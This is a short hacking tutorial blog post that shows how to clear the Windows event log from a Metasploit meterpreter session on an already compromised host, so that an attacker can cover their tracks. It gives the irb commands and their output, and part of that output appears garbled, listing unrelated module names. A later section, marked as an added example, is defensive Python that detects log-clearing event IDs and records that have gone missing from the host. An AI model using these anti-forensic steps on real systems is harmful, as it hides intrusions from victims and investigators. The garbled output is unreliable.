Remove Event Log – Cover Track After Hacking Metasploit

There are many ways to break into a computer, but after compromising it an attacker needs to cover their tracks, because every activity an attacker (or a normal user) performs is recorded by the system. So whenever an attacker breaks into a web server or a computer, they usually cover their tracks once the work is done so that no one is able to catch them. How attackers cover their tracks is an important topic that needs more tutorials, because every operating system has its own way of maintaining logs.
Log files contain information about every activity performed on a computer, so removing them is an important step in covering tracks. There are different ways to remove log files on Windows, Linux and Mac, but in this tutorial I will show you how to remove the event log on Windows using Metasploit post-exploitation.


  • Metasploit (BackTrack 5 R1 is used for this tutorial; you can use another distribution too)
  • A compromised host (it is very easy to hack into Windows using Metasploit, as discussed before; if you don't know how, let us know and I will share the link to the previous tutorial)
  • A brain
Now suppose you have hacked a Windows operating system and you have a meterpreter session. You can do multiple things via a meterpreter session, such as covering your tracks by removing the log file. The picture below shows how Windows maintains the logs that an attacker needs to remove.

In our meterpreter session we need to call a post-exploitation script that ships with Metasploit (you can create more scripts too). Let's call irb:

meterpreter > irb
[*] Starting IRB shell
[*] The 'client' variable holds the meterpreter client
>> client.sys.config.sysinfo()
=> {"Computer"=>"VIRTUAL-7C33D2A", "OS"=>"Windows XP (Build 2600, Service Pack 2).", "Architecture"=>"x86", "System Language"=>"en_US"}

Then we need to clear the log, which requires an easy command.

>> log.clear
=> #<#:0xb6779424 @client=#>,
/trendmicro_serverprotect_earthagent"=>#, "windows/browser/ie_iscomponentinstalled"=>#, "windows/exec/reverse_ord_tcp"=>#, "windows/http/apache_chunked"=>#, "windows/imap/novell_netmail_append"=>#

That's it.
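On the defending side, a cleared log is itself evidence. The following added example (not part of the original tutorial) flags the event IDs Windows writes when a log is cleared and compares the copies forwarded to a collector against what is still on the host; the second check does not depend on a clear event being present. The JSON-lines record format, the field names and the sample records are assumptions constructed for illustration.

```python
import json
from datetime import datetime

# (channel, event ID) pairs Windows writes when a log is cleared.
CLEAR_EVENTS = {
    ("Security", 517),   # Windows XP / Server 2003: the audit log was cleared
    ("Security", 1102),  # Windows Vista and later: the audit log was cleared
    ("System", 104),     # Windows Vista and later: a log file was cleared
}

# Constructed sample: records a collector received from the host (JSON lines).
FORWARDED = """\
{"channel": "System", "event_id": 7036, "time": "2011-09-02T09:14:05"}
{"channel": "System", "event_id": 7035, "time": "2011-09-02T09:14:06"}
{"channel": "Security", "event_id": 528, "time": "2011-09-02T09:20:41"}
{"channel": "Security", "event_id": 517, "time": "2011-09-02T09:31:12"}
{"channel": "System", "event_id": 7036, "time": "2011-09-02T09:40:00"}
"""
# Constructed sample: what is still present in the host's own logs afterwards.
LOCAL = """\
{"channel": "Security", "event_id": 517, "time": "2011-09-02T09:31:12"}
{"channel": "System", "event_id": 7036, "time": "2011-09-02T09:40:00"}
"""

def load(text):
    """Parse JSON-lines records and convert the time field to datetime."""
    records = [json.loads(line) for line in text.splitlines() if line.strip()]
    for rec in records:
        rec["time"] = datetime.fromisoformat(rec["time"])
    return records

def clear_events(records):
    """Records whose (channel, event ID) marks a log being cleared."""
    return [r for r in records if (r["channel"], r["event_id"]) in CLEAR_EVENTS]

def missing_on_host(forwarded, local, since):
    """Per channel, count forwarded records from `since` on that the host lost."""
    # Pick `since` inside the host's retention window so that normal rollover
    # of old records is not mistaken for a deliberate clear.
    key = lambda rec: (rec["channel"], rec["event_id"], rec["time"])
    kept = {key(r) for r in local}
    missing = {}
    for rec in forwarded:
        if rec["time"] >= since and key(rec) not in kept:
            missing[rec["channel"]] = missing.get(rec["channel"], 0) + 1
    return missing

if __name__ == "__main__":
    fwd, loc = load(FORWARDED), load(LOCAL)
    print(clear_events(fwd), missing_on_host(fwd, loc, datetime(2011, 9, 2)))
```

The comparison only works if records leave the host as they are written, so forwarding to a collector the compromised account cannot modify is the control that makes it possible.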

Ehacking Staff